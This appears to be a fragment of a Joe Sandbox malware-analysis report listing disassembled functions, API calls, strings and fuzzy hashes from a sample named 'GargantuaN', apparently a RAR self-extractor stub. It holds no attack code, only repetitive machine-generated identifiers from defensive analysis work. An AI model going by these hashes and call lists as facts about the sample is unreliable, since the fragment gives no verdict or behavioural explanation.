                                                        • API String ID: 3937224194-1658105358
                                                        • Opcode ID: ff24540e4080d3a3f88706c9cb451784f7ce8e52f0017576da8b7dc3a4bc7478
                                                        • Instruction ID: d0616876f24a0ebad2eaaf7d7b27e4dbda69bc189d05656d24231b76ecc38ef8
                                                        • Opcode Fuzzy Hash: ff24540e4080d3a3f88706c9cb451784f7ce8e52f0017576da8b7dc3a4bc7478
                                                        • Instruction Fuzzy Hash: B341AF31104310EFCB219F68DC49B6BBBACEF48741F058659F849AA15ADB34D914DF71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                        • API String ID: 176396367-3743748572
                                                        • Opcode ID: 9782399f7d7ff3e6b3c9976ab58fc6ec486547418d7582299a4bb69d0228fd9f
                                                        • Instruction ID: 6ebd1dc9ab77c59d0500fc3385cf04781026a29609c974fe20cfbebe68bd0887
                                                        • Opcode Fuzzy Hash: 9782399f7d7ff3e6b3c9976ab58fc6ec486547418d7582299a4bb69d0228fd9f
                                                        • Instruction Fuzzy Hash: E131593664434567DA30AB949C62B7AF3E8EB90720F64851FF88697280FA70AD4483B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D7C868: _free.LIBCMT ref: 00D7C891
                                                        • _free.LIBCMT ref: 00D7C8F2
                                                          • Part of subcall function 00D78DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?), ref: 00D78DE2
                                                          • Part of subcall function 00D78DCC: GetLastError.KERNEL32(?,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?,?), ref: 00D78DF4
                                                        • _free.LIBCMT ref: 00D7C8FD
                                                        • _free.LIBCMT ref: 00D7C908
                                                        • _free.LIBCMT ref: 00D7C95C
                                                        • _free.LIBCMT ref: 00D7C967
                                                        • _free.LIBCMT ref: 00D7C972
                                                        • _free.LIBCMT ref: 00D7C97D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                        • Instruction ID: 39d238f12eccbdc62630d6e1053de2dca08f4eab226d99918b3985d8d18a6102
                                                        • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                        • Instruction Fuzzy Hash: CE110D71590B04EEE530B7B1CC0BFCB7BACDF04B10F809C19B29D66093EA65A5059771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D6E669,00D6E5CC,00D6E86D), ref: 00D6E605
                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D6E61B
                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D6E630
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$HandleModule
                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                        • API String ID: 667068680-1718035505
                                                        • Opcode ID: 0c35f3e7fda556d03d8b70538e4452347a556453ba03e4c1580822c7b5dc3f6b
                                                        • Instruction ID: 0ef40febec86d8ed96a799a7c384a4243bae8ddc275e035af92c8f785106a867
                                                        • Opcode Fuzzy Hash: 0c35f3e7fda556d03d8b70538e4452347a556453ba03e4c1580822c7b5dc3f6b
                                                        • Instruction Fuzzy Hash: 86F0C23D790322DF4F215EEAEC945B667C86A257413280D79D905D3300EB10CC585BF1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D614C2
                                                          • Part of subcall function 00D5B146: GetVersionExW.KERNEL32(?), ref: 00D5B16B
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D614E6
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D61500
                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D61513
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D61523
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D61533
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                        • String ID:
                                                        • API String ID: 2092733347-0
                                                        • Opcode ID: 9fa0dc7703023152e08503834aa5226185e47796756ce84a19b37e910d36a71e
                                                        • Instruction ID: 01d3d0aacb180d4965f03b30e158c4731ad384f5841dc4997db74ec34d0697d7
                                                        • Opcode Fuzzy Hash: 9fa0dc7703023152e08503834aa5226185e47796756ce84a19b37e910d36a71e
                                                        • Instruction Fuzzy Hash: 7631D779118345ABC704DFA8C89499BB7F8FF98B14F044A1EF999C3210E730D549CBA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00D72AF1,00D702FC,00D6FA34), ref: 00D72B08
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D72B16
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D72B2F
                                                        • SetLastError.KERNEL32(00000000,00D72AF1,00D702FC,00D6FA34), ref: 00D72B81
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: f7e53f01bf889f3e4a95560cdff7f251963321f7d60185b1d71f2a9ba81aa7ae
                                                        • Instruction ID: 95fe34bd6fde1452091b00a979161f14a3793fc06da83906410c2d72825a1446
                                                        • Opcode Fuzzy Hash: f7e53f01bf889f3e4a95560cdff7f251963321f7d60185b1d71f2a9ba81aa7ae
                                                        • Instruction Fuzzy Hash: 3C01D4322283216EA7242E747C859362B99EB42B74B64873AF11C952E9FF114D04A674
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLastError.KERNEL32(?,00D91030,00D74674,00D91030,?,?,00D73F73,00000050,?,00D91030,00000200), ref: 00D797E9
                                                        • _free.LIBCMT ref: 00D7981C
                                                        • _free.LIBCMT ref: 00D79844
                                                        • SetLastError.KERNEL32(00000000,?,00D91030,00000200), ref: 00D79851
                                                        • SetLastError.KERNEL32(00000000,?,00D91030,00000200), ref: 00D7985D
                                                        • _abort.LIBCMT ref: 00D79863
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: ec2dcec57dddcbfeb1b3c7bf715f85774a0cbe5cec1d139beab19624575a6c12
                                                        • Instruction ID: 3f3094436253186cc325103ca540a220ebd7fdcb9d10ddb635a8f9fa1b69e4a4
                                                        • Opcode Fuzzy Hash: ec2dcec57dddcbfeb1b3c7bf715f85774a0cbe5cec1d139beab19624575a6c12
                                                        • Instruction Fuzzy Hash: 2EF0A4371507016AC72237286C2AB2F9A65CFD2B71F298129F51CD6392FE20C8055676
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D6DC47
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6DC61
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6DC72
                                                        • TranslateMessage.USER32(?), ref: 00D6DC7C
                                                        • DispatchMessageW.USER32(?), ref: 00D6DC86
                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D6DC91
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                        • String ID:
                                                        • API String ID: 2148572870-0
                                                        • Opcode ID: 45da822008497b2e66a1fe11bcacb3a9db16ba45e9be1d3781457c3a6de17ebe
                                                        • Instruction ID: 400eb09a4c3631b045d073aaa7bf176542188e43ce5668bb7f60e99d705f25cc
                                                        • Opcode Fuzzy Hash: 45da822008497b2e66a1fe11bcacb3a9db16ba45e9be1d3781457c3a6de17ebe
                                                        • Instruction Fuzzy Hash: 74F01472A01219FBCA206FA5EC4CDCB7F6DEF46791B044121B90AE2160D6649646DBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D605DA: _wcslen.LIBCMT ref: 00D605E0
                                                          • Part of subcall function 00D5B92D: _wcsrchr.LIBVCRUNTIME ref: 00D5B944
                                                        • _wcslen.LIBCMT ref: 00D5C197
                                                        • _wcslen.LIBCMT ref: 00D5C1DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_wcsrchr
                                                        • String ID: .exe$.rar$.sfx
                                                        • API String ID: 3513545583-31770016
                                                        • Opcode ID: 5d95a45746ab1e5bde4cd49cd9ce8220d6b52d372385005ea5ff9d39bb7b822a
                                                        • Instruction ID: 69958957260f8f18b7747ee5e62fc4ba8e36930f6e8e79b99f26342467ebf549
                                                        • Opcode Fuzzy Hash: 5d95a45746ab1e5bde4cd49cd9ce8220d6b52d372385005ea5ff9d39bb7b822a
                                                        • Instruction Fuzzy Hash: B24127265207119ECF31AF648852E3BB3A4EF41B55F18690EFDC66B0C1EB509D89C3B5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 00D6CE9D
                                                          • Part of subcall function 00D5B690: _wcslen.LIBCMT ref: 00D5B696
                                                        • _swprintf.LIBCMT ref: 00D6CED1
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        • SetDlgItemTextW.USER32(?,00000066,00D9946A), ref: 00D6CEF1
                                                        • EndDialog.USER32(?,00000001), ref: 00D6CFFE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                        • String ID: %s%s%u
                                                        • API String ID: 110358324-1360425832
                                                        • Opcode ID: 26c3671ae3351a5ce96cae45d456631031629d630c874ce70b3243ca604a39b5
                                                        • Instruction ID: 6f64e80e7abd731c74c40fd8b0d8103ef02b889248afa80f249ed224ea14cf50
                                                        • Opcode Fuzzy Hash: 26c3671ae3351a5ce96cae45d456631031629d630c874ce70b3243ca604a39b5
                                                        • Instruction Fuzzy Hash: B641ADB1900218ABDF219BA4DC55EEA77BCEF05300F4080A6F949E7141EA718A88CFB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00D5BB27
                                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00D5A275,?,?,00000800,?,00D5A23A,?,00D5755C), ref: 00D5BBC5
                                                        • _wcslen.LIBCMT ref: 00D5BC3B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$CurrentDirectory
                                                        • String ID: UNC$\\?\
                                                        • API String ID: 3341907918-253988292
                                                        • Opcode ID: e64acbfbf4c3e948e6be267357d4898665d84dd66f9c360ca1ca706d1e715de2
                                                        • Instruction ID: 6c1cc9c724d4c542a3d01c02f3291aa7d3578a79917742103cf24c53ff7da135
                                                        • Opcode Fuzzy Hash: e64acbfbf4c3e948e6be267357d4898665d84dd66f9c360ca1ca706d1e715de2
                                                        • Instruction Fuzzy Hash: F3418E31400615ABCF21AF60CC02EFB77A9EF417A2F148467FC59A3151EB70DA988BB4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadBitmapW.USER32(00000065), ref: 00D6B6ED
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00D6B712
                                                        • DeleteObject.GDI32(00000000), ref: 00D6B744
                                                        • DeleteObject.GDI32(00000000), ref: 00D6B767
                                                          • Part of subcall function 00D6A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D6B73D,00000066), ref: 00D6A6D5
                                                          • Part of subcall function 00D6A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A6EC
                                                          • Part of subcall function 00D6A6C2: LoadResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A703
                                                          • Part of subcall function 00D6A6C2: LockResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A712
                                                          • Part of subcall function 00D6A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D6B73D,00000066), ref: 00D6A72D
                                                          • Part of subcall function 00D6A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00D6B73D,00000066), ref: 00D6A73E
                                                          • Part of subcall function 00D6A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D6A7A7
                                                          • Part of subcall function 00D6A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00D6A7C6
                                                          • Part of subcall function 00D6A6C2: GlobalFree.KERNEL32(00000000), ref: 00D6A7CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                        • String ID: ]
                                                        • API String ID: 1428510222-3352871620
                                                        • Opcode ID: d93d5245e660f55b2d9432a4b5431376e1f77c5892d8e4fd2c30d1ef63e3132c
                                                        • Instruction ID: 989976b47fa07eaa1ac9d044f6ae80416aca7a39187d219fc0e75da28690d94c
                                                        • Opcode Fuzzy Hash: d93d5245e660f55b2d9432a4b5431376e1f77c5892d8e4fd2c30d1ef63e3132c
                                                        • Instruction Fuzzy Hash: 41010036540711A7C712BB788C4AA7F7AB9EFC0B62F0A0012F940F7291DF218D495AB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • EndDialog.USER32(?,00000001), ref: 00D6D64B
                                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D6D661
                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D6D675
                                                        • SetDlgItemTextW.USER32(?,00000068), ref: 00D6D684
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ItemText$DialogWindow
                                                        • String ID: RENAMEDLG
                                                        • API String ID: 445417207-3299779563
                                                        • Opcode ID: 53ea0a69c50f770c99d00c5aa30da80a999f3c71edf624f1a9f0f3e018e55f40
                                                        • Instruction ID: b64c7b884d57cb7fbf946fecd7a5e2bc7c72669d99763eff17efb3626ed796a4
                                                        • Opcode Fuzzy Hash: 53ea0a69c50f770c99d00c5aa30da80a999f3c71edf624f1a9f0f3e018e55f40
                                                        • Instruction Fuzzy Hash: 3C01F533B84318FBD2205FA8ED09F567B5EEB9AB01F110111F645E21D4C6A2D9049B75
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D77E24,00000000,?,00D77DC4,00000000,00D8C300,0000000C,00D77F1B,00000000,00000002), ref: 00D77E93
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D77EA6
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00D77E24,00000000,?,00D77DC4,00000000,00D8C300,0000000C,00D77F1B,00000000,00000002), ref: 00D77EC9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 8d1aa7a92ef82ac10af66562cebc2c158eb48fe4691b168f8fecb45f9cd5d7e5
                                                        • Instruction ID: ae9fa14595631e277461235078c7ab745d2eaf0858d57a3e8bf94d4af88e1cbb
                                                        • Opcode Fuzzy Hash: 8d1aa7a92ef82ac10af66562cebc2c158eb48fe4691b168f8fecb45f9cd5d7e5
                                                        • Instruction Fuzzy Hash: 07F04431914209BFCB119FA5DC09B9EBFB4EB44711F0480A9F809E2260DB309E44CBB4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D6081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D60836
                                                          • Part of subcall function 00D6081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5F2D8,Crypt32.dll,00000000,00D5F35C,?,?,00D5F33E,?,?,?), ref: 00D60858
                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D5F2E4
                                                        • GetProcAddress.KERNEL32(00D981C8,CryptUnprotectMemory), ref: 00D5F2F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                        • API String ID: 2141747552-1753850145
